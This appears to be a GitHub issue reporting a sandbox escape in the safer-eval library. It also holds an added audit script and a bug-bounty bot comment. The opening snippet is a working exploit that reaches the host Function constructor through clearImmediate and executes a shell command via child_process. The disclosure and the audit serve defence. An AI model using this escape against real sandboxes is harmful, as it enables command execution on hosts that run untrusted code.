safer-eval

Breakout

Open XmiliaH opened this issue 6 years ago • 1 comments

One can break out of the sandbox with the following code in node:

const saferEval = require("./src/index");

const theFunction = function () {
  const process = clearImmediate.constructor("return process;")();
  return process.mainModule.require("child_process").execSync("whoami").toString()
};
const untrusted = `(${theFunction})()`;

console.log(saferEval(untrusted));

XmiliaH, Dec 09 '19 22:12
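
The snippet above depends on `clearImmediate.constructor` resolving to the host realm's `Function`. The audit below is an added example, not part of the original issue or of safer-eval's code; it lists which exposed globals let that constructor be reached. It uses Node's built-in `vm` module as a stand-in sandbox, and `findHostFunctionLeaks`, `PROBE` and the sample globals are hypothetical names constructed for illustration.

```javascript
const vm = require("node:vm");

// Runs inside the sandbox context and walks value -> value.constructor -> ...
// so each lookup happens the way sandboxed code would perform it.
const PROBE = `(function (value, maxDepth) {
  const chain = [];
  let cur = value;
  for (let i = 0; i < maxDepth && cur != null; i++) {
    try { cur = cur.constructor; } catch (e) { break; }
    chain.push(cur);
  }
  return chain;
})`;

// Returns the names of exposed globals from which the host realm's Function
// constructor is reachable. `exposed` is a hypothetical map of sandbox globals.
function findHostFunctionLeaks(exposed, maxDepth = 3) {
  const context = vm.createContext({});
  const probe = vm.runInContext(PROBE, context);
  return Object.keys(exposed).filter((name) =>
    probe(exposed[name], maxDepth).some((c) => c === Function)
  );
}

// Constructed sample: globals a sandbox might hand to untrusted code.
const sampleGlobals = {
  clearImmediate,                 // host function, as used in the issue
  config: { retries: 3 },         // plain host object
  answer: 42,                     // primitive, boxed in the sandbox realm
  bare: Object.create(null),      // no prototype, so no constructor
};

console.log(findHostFunctionLeaks(sampleGlobals));
```

Host functions and plain host objects are both reported, because an object's `constructor` is the host `Object`, whose own `constructor` is the host `Function`. Node's documentation states that `vm` is not a security mechanism, so it serves here only to provide a second realm for the comparison.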

👋 Hey! We've recently opened a bug bounty against this issue, so if you want to get rewarded 💰 for fixing this vulnerability 🕷, head over to https://huntr.dev!

huntr-helper, Mar 14 '20 09:03